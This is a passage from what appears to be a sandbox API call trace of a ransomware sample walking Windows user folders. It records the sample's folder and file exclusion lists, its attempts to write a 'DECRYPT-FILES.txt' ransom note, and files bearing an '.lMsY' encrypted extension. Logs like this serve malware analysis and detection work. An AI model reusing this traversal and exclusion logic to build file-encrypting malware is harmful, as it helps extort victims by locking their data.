lpSrch="\\ProgramData\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\All Users") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="AhnLab") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.399] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned 51 [0186.399] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.399] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\0a16c9.tmp") returned 62 [0186.399] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.406] GetLastError () returned 0x5 [0186.407] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned 51 [0186.407] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.407] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt") returned 69 [0186.407] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.408] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned 51 [0186.408] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\*" [0186.408] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.409] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.409] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.409] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0186.409] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0186.409] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0186.409] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0186.409] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Program Files") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch=":\\Windows") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Games\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\All Users") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="AhnLab") returned 0x0 [0186.409] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.409] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 59 [0186.409] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.409] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\0a16c9.tmp") returned 70 [0186.409] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.410] GetLastError () returned 0x5 [0186.410] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 59 [0186.410] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.410] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt") returned 77 [0186.410] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.410] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 59 [0186.410] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0186.410] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.411] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.411] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.411] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.411] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b25da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.411] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.411] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.lMsY", cAlternateFileName="INDEXD~1.LMS")) returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="DECRYPT-FILES.txt") returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="autorun.inf") returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="boot.ini") returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="desktop.ini") returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="ntuser.dat") returned -1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="iconcache.db") returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="bootsect.bak") returned 1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="ntuser.dat.log") returned -1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="thumbs.db") returned -1 [0186.411] lstrcmpiW (lpString1="index.dat.lMsY", lpString2="Bootfont.bin") returned 1 [0186.411] lstrlenW (lpString="index.dat.lMsY") returned 14 [0186.411] lstrcmpiW (lpString1="lMsY", lpString2="lnk") returned -1 [0186.411] lstrcmpiW (lpString1="lMsY", lpString2="exe") returned 1 [0186.411] lstrcmpiW (lpString1="lMsY", lpString2="sys") returned -1 [0186.411] lstrcmpiW (lpString1="lMsY", lpString2="dll") returned 1 [0186.411] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 59 [0186.411] lstrlenW (lpString="index.dat.lMsY") returned 14 [0186.411] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0186.411] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="index.dat.lMsY" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.lMsY") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.lMsY" [0186.411] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.412] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.lMsY" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.lmsy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.412] CloseHandle (hObject=0x0) returned 0 [0186.412] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.412] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.lMsY", cAlternateFileName="INDEXD~1.LMS")) returned 0 [0186.412] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.412] CloseHandle (hObject=0xffffffff) returned 0 [0186.412] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b25da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.412] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.412] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0186.412] lstrcmpW (lpString1="IECompatCache", lpString2=".") returned 1 [0186.412] lstrcmpW (lpString1="IECompatCache", lpString2="..") returned 1 [0186.412] lstrcatW (in: lpString1="IECompatCache", lpString2="\\" | out: lpString1="IECompatCache\\") returned="IECompatCache\\" [0186.412] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IECompatCache\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Program Files") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch=":\\Windows") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Games\\") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.412] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.413] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\All Users") returned 0x0 [0186.413] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.413] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.413] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.413] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="AhnLab") returned 0x0 [0186.413] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.413] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 65 [0186.413] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.413] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\0a16c9.tmp") returned 76 [0186.413] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.414] GetLastError () returned 0x5 [0186.414] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 65 [0186.414] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.414] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt") returned 83 [0186.414] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.414] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 65 [0186.414] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0186.414] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.415] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.415] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.415] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.415] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.415] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b4bf00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.415] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.415] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0186.415] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0186.415] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0186.415] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0186.415] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="Low\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Program Files") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch=":\\Windows") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Games\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\All Users") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.415] StrStrW 